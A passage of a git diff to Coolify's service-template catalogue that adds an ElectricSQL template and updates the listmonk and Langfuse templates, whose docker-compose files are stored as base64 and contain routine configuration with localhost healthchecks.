CdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRU5BQkxFRD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FTkFCTEVEOi1mYWxzZX0nCiAgICAgIDI3OiAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0JVQ0tFVD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9CVUNLRVQ6LWxhbmdmdXNlfScKICAgICAgMjg6ICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfUFJFRklYPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1BSRUZJWDotZXhwb3J0cy99JwogICAgICAyOTogJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9SRUdJT049JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfUkVHSU9OOi1hdXRvfScKICAgICAgMzA6ICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRU5EUE9JTlQ9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRU5EUE9JTlR9JwogICAgICAzMTogJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FWFRFUk5BTF9FTkRQT0lOVD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FWFRFUk5BTF9FTkRQT0lOVH0nCiAgICAgIDMyOiAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0FDQ0VTU19LRVlfSUQ9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfQUNDRVNTX0tFWV9JRH0nCiAgICAgIDMzOiAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1NFQ1JFVF9BQ0NFU1NfS0VZPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1NFQ1JFVF9BQ0NFU1NfS0VZfScKICAgICAgMzQ6ICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRk9SQ0VfUEFUSF9TVFlMRT0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9GT1JDRV9QQVRIX1NUWUxFOi10cnVlfScKICAgICAgMzU6ICdMQU5HRlVTRV9JTkdFU1RJT05fUVVFVUVfREVMQVlfTVM9JHtMQU5HRlVTRV9JTkdFU1RJT05fUVVFVUVfREVMQVlfTVM6LTF9JwogICAgICAzNjogJ0xBTkdGVVNFX0lOR0VTVElPTl9DTElDS0hPVVNFX1dSSVRFX0lOVEVSVkFMX01TPSR7TEFOR0ZVU0VfSU5HRVNUSU9OX0NMSUNLSE9VU0VfV1JJVEVfSU5URVJWQUxfTVM6LTEwMDB9JwogICAgICAzNzogUkVESVNfSE9TVD1yZWRpcwogICAgICAzODogUkVESVNfUE9SVD02Mzc5CiAgICAgIDM5OiAnUkVESVNfQVVUSD0ke1NFUlZJQ0VfUEFTU1dPUkRfUkVESVN9JwogICAgICA0MDogJ0VNQUlMX0ZST01fQUREUkVTUz0ke0VNQUlMX0ZST01fQUREUkVTUzotYWRtaW5AZXhhbXBsZS5jb219JwogICAgICA0MTogJ1NNVFBfQ09OTkVDVElPTl9VUkw9JHtTTVRQX0NPTk5FQ1RJT05fVVJMOi19JwogICAgICA0MjogJ05FWFRBVVRIX1NFQ1JFVD0ke1NFUlZJQ0VfQkFTRTY0X05FWFRBVVRIU0VDUkVUfScKICAgICAgNDM6ICdBVVRIX0RJU0FCTEVfU0lHTlVQPSR7QVVUSF9ESVNBQkxFX1NJR05VUDotdHJ1ZX0nCiAgICAgIDQ0OiAnSE9TVE5BTUU9JHtIT1NUTkFNRTotMC4wLjAuMH0nCiAgICAgIDQ1OiAnTEFOR0ZVU0VfSU5JVF9PUkdfSUQ9JHtMQU5HRlVTRV9JTklUX09SR19JRDotbXktb3JnfScKICAgICAgNDY6ICdMQU5HRlVTRV9JTklUX09SR19OQU1FPSR7TEFOR0ZVU0VfSU5JVF9PUkdfTkFNRTotTXkgT3JnfScKICAgICAgNDc6ICdMQU5HRlVTRV9JTklUX1BST0pFQ1RfSUQ9JHtMQU5HRlVTRV9JTklUX1BST0pFQ1RfSUQ6LW15LXByb2plY3R9JwogICAgICA0ODogJ0xBTkdGVVNFX0lOSVRfUFJPSkVDVF9OQU1FPSR7TEFOR0ZVU0VfSU5JVF9QUk9KRUNUX05BTUU6LU15IFByb2plY3R9JwogICAgICA0OTogJ0xBTkdGVVNFX0lOSVRfVVNFUl9FTUFJTD0ke0xBTkdGVVNFX0lOSVRfVVNFUl9FTUFJTDotYWRtaW5AZXhhbXBsZS5jb219JwogICAgICA1MDogJ0xBTkdGVVNFX0lOSVRfVVNFUl9OQU1FPSR7U0VSVklDRV9VU0VSX0xBTkdGVVNFfScKICAgICAgNTE6ICdMQU5HRlVTRV9JTklUX1VTRVJfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX0xBTkdGVVNFfScKICAgICAgU0VSVklDRV9VUkxfTEFOR0ZVU0VfMzAwMDogJyR7U0VSVklDRV9VUkxfTEFOR0ZVU0VfMzAwMH0nCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gd2dldAogICAgICAgIC0gJy1xJwogICAgICAgIC0gJy0tc3BpZGVyJwogICAgICAgIC0gJ2h0dHA6Ly8xMjcuMC4wLjE6MzAwMC9hcGkvcHVibGljL2hlYWx0aCcKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIHJldHJpZXM6IDMKICBsYW5nZnVzZS13b3JrZXI6CiAgICBpbWFnZTogJ2xhbmdmdXNlL2xhbmdmdXNlLXdvcmtlcjozJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ05FWFRBVVRIX1VSTD0ke1NFUlZJQ0VfVVJMX0xBTkdGVVNFfScKICAgICAgLSAnREFUQUJBU0VfVVJMPXBvc3RncmVzcWw6Ly8ke1NFUlZJQ0VfVVNFUl9QT1NUR1JFU306JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfUBwb3N0Z3Jlczo1NDMyLyR7UE9TVEdSRVNfREI6LWxhbmdmdXNlLWRifScKICAgICAgLSAnU0FMVD0ke1NFUlZJQ0VfUEFTU1dPUkRfU0FMVH0nCiAgICAgIC0gJ0VOQ1JZUFRJT05fS0VZPSR7U0VSVklDRV9QQVNTV09SRF82NF9MQU5HRlVTRX0nCiAgICAgIC0gJ1RFTEVNRVRSWV9FTkFCTEVEPSR7VEVMRU1FVFJZX0VOQUJMRUQ6LWZhbHNlfScKICAgICAgLSAnTEFOR0ZVU0VfRU5BQkxFX0VYUEVSSU1FTlRBTF9GRUFUVVJFUz0ke0xBTkdGVVNFX0VOQUJMRV9FWFBFUklNRU5UQUxfRkVBVFVSRVM6LWZhbHNlfScKICAgICAgLSAnQ0xJQ0tIT1VTRV9NSUdSQVRJT05fVVJMPWNsaWNraG91c2U6Ly9jbGlja2hvdXNlOjkwMDAnCiAgICAgIC0gJ0NMSUNLSE9VU0VfVVJMPWh0dHA6Ly9jbGlja2hvdXNlOjgxMjMnCiAgICAgIC0gJ0NMSUNLSE9VU0VfVVNFUj0ke1NFUlZJQ0VfVVNFUl9DTElDS0hPVVNFfScKICAgICAgLSAnQ0xJQ0tIT1VTRV9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfQ0xJQ0tIT1VTRX0nCiAgICAgIC0gQ0xJQ0tIT1VTRV9DTFVTVEVSX0VOQUJMRUQ9ZmFsc2UKICAgICAgLSAnTEFOR0ZVU0VfVVNFX0FaVVJFX0JMT0I9JHtMQU5HRlVTRV9VU0VfQVpVUkVfQkxPQjotZmFsc2V9JwogICAgICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfQlVDS0VUPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0JVQ0tFVDotbGFuZ2Z1c2V9JwogICAgICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfUkVHSU9OPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX1JFR0lPTjotYXV0b30nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9BQ0NFU1NfS0VZX0lEPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0FDQ0VTU19LRVlfSUR9JwogICAgICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfU0VDUkVUX0FDQ0VTU19LRVk9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfU0VDUkVUX0FDQ0VTU19LRVl9JwogICAgICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfRU5EUE9JTlQ9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfRU5EUE9JTlR9JwogICAgICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfRk9SQ0VfUEFUSF9TVFlMRT0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9GT1JDRV9QQVRIX1NUWUxFOi10cnVlfScKICAgICAgLSAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX1BSRUZJWD0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9QUkVGSVg6LWV2ZW50cy99JwogICAgICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfQlVDS0VUPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0JVQ0tFVDotbGFuZ2Z1c2V9JwogICAgICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfUkVHSU9OPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1JFR0lPTjotYXV0b30nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9BQ0NFU1NfS0VZX0lEPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0FDQ0VTU19LRVlfSUR9JwogICAgICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfU0VDUkVUX0FDQ0VTU19LRVk9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfU0VDUkVUX0FDQ0VTU19LRVl9JwogICAgICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfRU5EUE9JTlQ9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfRU5EUE9JTlR9JwogICAgICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfRk9SQ0VfUEFUSF9TVFlMRT0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9GT1JDRV9QQVRIX1NUWUxFOi10cnVlfScKICAgICAgLSAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1BSRUZJWD0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9QUkVGSVg6LW1lZGlhL30nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FTkFCTEVEPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0VOQUJMRUQ6LWZhbHNlfScKICAgICAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0JVQ0tFVD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9CVUNLRVQ6LWxhbmdmdXNlfScKICAgICAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1BSRUZJWD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9QUkVGSVg6LWV4cG9ydHMvfScKICAgICAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1JFR0lPTj0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9SRUdJT046LWF1dG99JwogICAgICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRU5EUE9JTlQ9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRU5EUE9JTlR9JwogICAgICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRVhURVJOQUxfRU5EUE9JTlQ9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRVhURVJOQUxfRU5EUE9JTlR9JwogICAgICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfQUNDRVNTX0tFWV9JRD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9BQ0NFU1NfS0VZX0lEfScKICAgICAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1NFQ1JFVF9BQ0NFU1NfS0VZPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1NFQ1JFVF9BQ0NFU1NfS0VZfScKICAgICAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0ZPUkNFX1BBVEhfU1RZTEU9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRk9SQ0VfUEFUSF9TVFlMRTotdHJ1ZX0nCiAgICAgIC0gJ0xBTkdGVVNFX0lOR0VTVElPTl9RVUVVRV9ERUxBWV9NUz0ke0xBTkdGVVNFX0lOR0VTVElPTl9RVUVVRV9ERUxBWV9NUzotMX0nCiAgICAgIC0gJ0xBTkdGVVNFX0lOR0VTVElPTl9DTElDS0hPVVNFX1dSSVRFX0lOVEVSVkFMX01TPSR7TEFOR0ZVU0VfSU5HRVNUSU9OX0NMSUNLSE9VU0VfV1JJVEVfSU5URVJWQUxfTVM6LTEwMDB9JwogICAgICAtIFJFRElTX0hPU1Q9cmVkaXMKICAgICAgLSBSRURJU19QT1JUPTYzNzkKICAgICAgLSAnUkVESVNfQVVUSD0ke1NFUlZJQ0VfUEFTU1dPUkRfUkVESVN9JwogICAgICAtICdFTUFJTF9GUk9NX0FERFJFU1M9JHtFTUFJTF9GUk9NX0FERFJFU1M6LWFkbWluQGV4YW1wbGUuY29tfScKICAgICAgLSAnU01UUF9DT05ORUNUSU9OX1VSTD0ke1NNVFBfQ09OTkVDVElPTl9VUkw6LX0nCiAgICAgIC0gJ05FWFRBVVRIX1NFQ1JFVD0ke1NFUlZJQ0VfQkFTRTY0X05FWFRBVVRIU0VDUkVUfScKICAgICAgLSAnQVVUSF9ESVNBQkxFX1NJR05VUD0ke0FVVEhfRElTQUJMRV9TSUdOVVA6LXRydWV9JwogICAgICAtICdIT1NUTkFNRT0ke0hPU1ROQU1FOi0wLjAuMC4wfScKICAgICAgLSAnTEFOR0ZVU0VfSU5JVF9PUkdfSUQ9JHtMQU5HRlVTRV9JTklUX09SR19JRDotbXktb3JnfScKICAgICAgLSAnTEFOR0ZVU0VfSU5JVF9PUkdfTkFNRT0ke0xBTkdGVVNFX0lOSVRfT1JHX05BTUU6LU15IE9yZ30nCiAgICAgIC0gJ0xBTkdGVVNFX0lOSVRfUFJPSkVDVF9JRD0ke0xBTkdGVVNFX0lOSVRfUFJPSkVDVF9JRDotbXktcHJvamVjdH0nCiAgICAgIC0gJ0xBTkdGVVNFX0lOSVRfUFJPSkVDVF9OQU1FPSR7TEFOR0ZVU0VfSU5JVF9QUk9KRUNUX05BTUU6LU15IFByb2plY3R9JwogICAgICAtICdMQU5HRlVTRV9JTklUX1VTRVJfRU1BSUw9JHtMQU5HRlVTRV9JTklUX1VTRVJfRU1BSUw6LWFkbWluQGV4YW1wbGUuY29tfScKICAgICAgLSAnTEFOR0ZVU0VfSU5JVF9VU0VSX05BTUU9JHtTRVJWSUNFX1VTRVJfTEFOR0ZVU0V9JwogICAgICAtICdMQU5HRlVTRV9JTklUX1VTRVJfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX0xBTkdGVVNFfScKICAgIGRlcGVuZHNfb246CiAgICAgIHBvc3RncmVzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICAgIHJlZGlzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICAgIGNsaWNraG91c2U6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICBwb3N0Z3JlczoKICAgIGltYWdlOiAncG9zdGdyZXM6MTctYWxwaW5lJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ1BPU1RHUkVTX0RCPSR7UE9TVEdSRVNfREI6LWxhbmdmdXNlLWRifScKICAgICAgLSAnUE9TVEdSRVNfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfScKICAgICAgLSAnUE9TVEdSRVNfVVNFUj0ke1NFUlZJQ0VfVVNFUl9QT1NUR1JFU30nCiAgICB2b2x1bWVzOgogICAgICAtICdsYW5nZnVzZV9wb3N0Z3Jlc19kYXRhOi92YXIvbGliL3Bvc3RncmVzcWwvZGF0YScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAncGdfaXNyZWFkeSAtaCBsb2NhbGhvc3QgLVUgJCR7UE9TVEdSRVNfVVNFUn0gLWQgJCR7UE9TVEdSRVNfREJ9JwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogNXMKICAgICAgcmV0cmllczogMTAKICByZWRpczoKICAgIGltYWdlOiAncmVkaXM6OCcKICAgIGNvbW1hbmQ6CiAgICAgIC0gc2gKICAgICAgLSAnLWMnCiAgICAgIC0gJ3JlZGlzLXNlcnZlciAtLXJlcXVpcmVwYXNzICIkU0VSVklDRV9QQVNTV09SRF9SRURJUyInCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnUkVESVNfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX1JFRElTfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2xhbmdmdXNlX3JlZGlzX2RhdGE6L2RhdGEnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gcmVkaXMtY2xpCiAgICAgICAgLSAnLWEnCiAgICAgICAgLSAkU0VSVklDRV9QQVNTV09SRF9SRURJUwogICAgICAgIC0gUElORwogICAgICBpbnRlcnZhbDogM3MKICAgICAgdGltZW91dDogMTBzCiAgICAgIHJldHJpZXM6IDEwCiAgY2xpY2tob3VzZToKICAgIGltYWdlOiAnY2xpY2tob3VzZS9jbGlja2hvdXNlLXNlcnZlcjoyNi4yLjQuMjMnCiAgICB1c2VyOiAnMTAxOjEwMScKICAgIGVudmlyb25tZW50OgogICAgICAtICdDTElDS0hPVVNFX0RCPSR7Q0xJQ0tIT1VTRV9EQjotZGVmYXVsdH0nCiAgICAgIC0gJ0NMSUNLSE9VU0VfVVNFUj0ke1NFUlZJQ0VfVVNFUl9DTElDS0hPVVNFfScKICAgICAgLSAnQ0xJQ0tIT1VTRV9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfQ0xJQ0tIT1VTRX0nCiAgICB2b2x1bWVzOgogICAgICAtICdsYW5nZnVzZV9jbGlja2hvdXNlX2RhdGE6L3Zhci9saWIvY2xpY2tob3VzZScKICAgICAgLSAnbGFuZ2Z1c2VfY2xpY2tob3VzZV9sb2dzOi92YXIvbG9nL2NsaWNraG91c2Utc2VydmVyJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6ICd3Z2V0IC0tbm8tdmVyYm9zZSAtLXRyaWVzPTEgLS1zcGlkZXIgaHR0cDovL2xvY2FsaG9zdDo4MTIzL3BpbmcgfHwgZXhpdCAxJwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogNXMKICAgICAgcmV0cmllczogMTAK",
         "tags": [
             "ai",
             "qdrant",
@@ -2502,7 +2518,7 @@
     "listmonk": {
         "documentation": "https://listmonk.app/?utm_source=coolify.io",
         "slogan": "Self-hosted newsletter and mailing list manager",
-        "compose": "c2VydmljZXM6CiAgbGlzdG1vbms6CiAgICBpbWFnZTogJ2xpc3Rtb25rL2xpc3Rtb25rOnY2LjAuMCcKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfVVJMX0xJU1RNT05LXzkwMDAKICAgICAgLSAnTElTVE1PTktfYXBwX19hZGRyZXNzPTAuMC4wLjA6OTAwMCcKICAgICAgLSBMSVNUTU9OS19kYl9faG9zdD1wb3N0Z3JlcwogICAgICAtIExJU1RNT05LX2RiX19uYW1lPWxpc3Rtb25rCiAgICAgIC0gTElTVE1PTktfZGJfX3VzZXI9JFNFUlZJQ0VfVVNFUl9QT1NUR1JFUwogICAgICAtIExJU1RNT05LX2RiX19wYXNzd29yZD0kU0VSVklDRV9QQVNTV09SRF9QT1NUR1JFUwogICAgICAtIExJU1RNT05LX2RiX19wb3J0PTU0MzIKICAgICAgLSBUWj1FdGMvVVRDCiAgICB2b2x1bWVzOgogICAgICAtICdsaXN0bW9uay1kYXRhOi9saXN0bW9uay91cGxvYWRzJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIHdnZXQKICAgICAgICAtICctcScKICAgICAgICAtICctLXNwaWRlcicKICAgICAgICAtICdodHRwOi8vMTI3LjAuMC4xOjkwMDAnCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAKICAgIGRlcGVuZHNfb246CiAgICAgIHBvc3RncmVzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgbGlzdG1vbmstaW5pdGlhbC1kYXRhYmFzZS1zZXR1cDoKICAgIGltYWdlOiAnbGlzdG1vbmsvbGlzdG1vbms6djYuMC4wJwogICAgY29tbWFuZDogJy4vbGlzdG1vbmsgLS1pbnN0YWxsIC0teWVzIC0taWRlbXBvdGVudCcKICAgIHJlc3RhcnQ6ICdubycKICAgIGRlcGVuZHNfb246CiAgICAgIHBvc3RncmVzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBMSVNUTU9OS19kYl9faG9zdD1wb3N0Z3JlcwogICAgICAtIExJU1RNT05LX2RiX19uYW1lPWxpc3Rtb25rCiAgICAgIC0gTElTVE1PTktfZGJfX3VzZXI9JFNFUlZJQ0VfVVNFUl9QT1NUR1JFUwogICAgICAtIExJU1RNT05LX2RiX19wYXNzd29yZD0kU0VSVklDRV9QQVNTV09SRF9QT1NUR1JFUwogICAgICAtIExJU1RNT05LX2RiX19wb3J0PTU0MzIKICBwb3N0Z3JlczoKICAgIGltYWdlOiAncG9zdGdyZXM6MTgtYWxwaW5lJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gUE9TVEdSRVNfREI9bGlzdG1vbmsKICAgICAgLSBQT1NUR1JFU19QQVNTV09SRD0kU0VSVklDRV9QQVNTV09SRF9QT1NUR1JFUwogICAgICAtIFBPU1RHUkVTX1VTRVI9JFNFUlZJQ0VfVVNFUl9QT1NUR1JFUwogICAgdm9sdW1lczoKICAgICAgLSAncG9zdGdyZXMtZGF0YTovdmFyL2xpYi9wb3N0Z3Jlc3FsJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdwZ19pc3JlYWR5IC1VICQke1BPU1RHUkVTX1VTRVJ9IC1kICQke1BPU1RHUkVTX0RCfScKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAo=",
+        "compose": "c2VydmljZXM6CiAgbGlzdG1vbms6CiAgICBpbWFnZTogJ2xpc3Rtb25rL2xpc3Rtb25rOnY2LjAuMCcKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfVVJMX0xJU1RNT05LXzkwMDAKICAgICAgLSAnTElTVE1PTktfYXBwX19hZGRyZXNzPTAuMC4wLjA6OTAwMCcKICAgICAgLSBMSVNUTU9OS19kYl9faG9zdD1wb3N0Z3JlcwogICAgICAtIExJU1RNT05LX2RiX19kYXRhYmFzZT1saXN0bW9uawogICAgICAtIExJU1RNT05LX2RiX191c2VyPSRTRVJWSUNFX1VTRVJfUE9TVEdSRVMKICAgICAgLSBMSVNUTU9OS19kYl9fcGFzc3dvcmQ9JFNFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVMKICAgICAgLSBMSVNUTU9OS19kYl9fcG9ydD01NDMyCiAgICAgIC0gVFo9RXRjL1VUQwogICAgdm9sdW1lczoKICAgICAgLSAnbGlzdG1vbmstZGF0YTovbGlzdG1vbmsvdXBsb2FkcycKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSB3Z2V0CiAgICAgICAgLSAnLXEnCiAgICAgICAgLSAnLS1zcGlkZXInCiAgICAgICAgLSAnaHR0cDovLzEyNy4wLjAuMTo5MDAwJwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCiAgICBkZXBlbmRzX29uOgogICAgICBwb3N0Z3JlczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogIGxpc3Rtb25rLWluaXRpYWwtZGF0YWJhc2Utc2V0dXA6CiAgICBpbWFnZTogJ2xpc3Rtb25rL2xpc3Rtb25rOnY2LjAuMCcKICAgIGNvbW1hbmQ6ICcuL2xpc3Rtb25rIC0taW5zdGFsbCAtLXllcyAtLWlkZW1wb3RlbnQnCiAgICByZXN0YXJ0OiAnbm8nCiAgICBkZXBlbmRzX29uOgogICAgICBwb3N0Z3JlczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gTElTVE1PTktfZGJfX2hvc3Q9cG9zdGdyZXMKICAgICAgLSBMSVNUTU9OS19kYl9fZGF0YWJhc2U9bGlzdG1vbmsKICAgICAgLSBMSVNUTU9OS19kYl9fdXNlcj0kU0VSVklDRV9VU0VSX1BPU1RHUkVTCiAgICAgIC0gTElTVE1PTktfZGJfX3Bhc3N3b3JkPSRTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTCiAgICAgIC0gTElTVE1PTktfZGJfX3BvcnQ9NTQzMgogIHBvc3RncmVzOgogICAgaW1hZ2U6ICdwb3N0Z3JlczoxOC1hbHBpbmUnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBQT1NUR1JFU19EQj1saXN0bW9uawogICAgICAtIFBPU1RHUkVTX1BBU1NXT1JEPSRTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTCiAgICAgIC0gUE9TVEdSRVNfVVNFUj0kU0VSVklDRV9VU0VSX1BPU1RHUkVTCiAgICB2b2x1bWVzOgogICAgICAtICdwb3N0Z3Jlcy1kYXRhOi92YXIvbGliL3Bvc3RncmVzcWwnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ3BnX2lzcmVhZHkgLVUgJCR7UE9TVEdSRVNfVVNFUn0gLWQgJCR7UE9TVEdSRVNfREJ9JwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCg==",
         "tags": [
             "newsletter",
             "mailing list",
diff --git a/templates/service-templates.json b/templates/service-templates.json
index 85445faf6..768f43985 100644
--- a/templates/service-templates.json
+++ b/templates/service-templates.json
@@ -1102,6 +1102,22 @@
         "minversion": "0.0.0",
         "port": "9200"
     },
+    "electricsql": {
+        "documentation": "https://electric-sql.com/docs/guides/deployment?utm_source=coolify.io",
+        "slogan": "Sync shape-based subsets of your Postgres data over HTTP.",
+        "compose": "c2VydmljZXM6CiAgZWxlY3RyaWM6CiAgICBpbWFnZTogJ2VsZWN0cmljc3FsL2VsZWN0cmljOjEuNC4yJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9GUUROX0VMRUNUUklDXzMwMDAKICAgICAgLSAnREFUQUJBU0VfVVJMPSR7REFUQUJBU0VfVVJMOj99JwogICAgICAtICdFTEVDVFJJQ19TRUNSRVQ9JHtTRVJWSUNFX1BBU1NXT1JEXzY0X0VMRUNUUklDfScKICAgICAgLSBFTEVDVFJJQ19TVE9SQUdFX0RJUj0vYXBwL3BlcnNpc3RlbnQKICAgICAgLSAnRUxFQ1RSSUNfVVNBR0VfUkVQT1JUSU5HPSR7RUxFQ1RSSUNfVVNBR0VfUkVQT1JUSU5HOi1mYWxzZX0nCiAgICB2b2x1bWVzOgogICAgICAtICdlbGVjdHJpY19kYXRhOi9hcHAvcGVyc2lzdGVudCcKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSBjdXJsCiAgICAgICAgLSAnLWYnCiAgICAgICAgLSAnaHR0cDovLzEyNy4wLjAuMTozMDAwL3YxL2hlYWx0aCcKICAgICAgaW50ZXJ2YWw6IDEwcwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiA1Cg==",
+        "tags": [
+            "electric",
+            "electricsql",
+            "realtime",
+            "sync",
+            "postgresql"
+        ],
+        "category": "backend",
+        "logo": "svgs/electricsql.svg",
+        "minversion": "0.0.0",
+        "port": "3000"
+    },
     "emby": {
         "documentation": "https://emby.media/support/articles/Home.html?utm_source=coolify.io",
         "slogan": "A media server software that allows you to organize, stream, and access your multimedia content effortlessly.",
@@ -2356,7 +2372,7 @@
     "langfuse": {
         "documentation": "https://langfuse.com/docs?utm_source=coolify.io",
